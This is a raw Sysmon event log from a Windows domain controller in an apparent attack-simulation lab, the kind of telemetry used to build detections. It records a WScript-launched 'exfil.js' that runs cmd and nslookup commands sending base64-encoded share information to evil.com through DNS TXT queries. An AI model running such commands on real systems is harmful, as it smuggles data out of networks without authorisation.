10341000x8000000000000000194179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.594{2E1864BB-17A1-629A-783D-000000005F02}55526168C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-AF3D-000000005F02}4204C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.594{2E1864BB-17A5-629A-AF3D-000000005F02}4204C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltze.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.561{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldbxri.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.514{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=799914EA558BBC2D8C9D77413749AC89,SHA256=9ACEB331FF9B379AB8EBF84AE4E7CD1BD7972D6782D8AE3B5E54A9A49A9C3390,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-17A5-629A-AD3D-000000005F02}73245084C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-AE3D-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AE3D-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.476{2E1864BB-17A5-629A-AC3D-000000005F02}45924468C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-AE3D-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.483{2E1864BB-17A5-629A-AE3D-000000005F02}7992C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-AC3D-000000005F02}4592C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbxri.tmp 2>&1 22542200x8000000000000000194167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.219{00000000-0000-0000-0000-000000000000}708evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.106{00000000-0000-0000-0000-000000000000}4280evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.971{00000000-0000-0000-0000-000000000000}7192evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.547{00000000-0000-0000-0000-000000000000}6220evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.432{00000000-0000-0000-0000-000000000000}4832evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.235{00000000-0000-0000-0000-000000000000}5216evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000194161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.046{00000000-0000-0000-0000-000000000000}7644evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000194160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.414{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-AD3D-000000005F02}7324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.414{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-AD3D-000000005F02}7324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.414{2E1864BB-17A5-629A-AD3D-000000005F02}73245084C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-AC3D-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.376{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AD3D-000000005F02}7324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.360{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.360{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.360{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AC3D-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.360{2E1864BB-17A1-629A-783D-000000005F02}55524760C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-AC3D-000000005F02}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.374{2E1864BB-17A5-629A-AC3D-000000005F02}4592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbxri.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.360{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmri.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.345{2E1864BB-17A5-629A-AA3D-000000005F02}1292660C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-AB3D-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.345{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.345{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.345{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AB3D-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.345{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.329{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 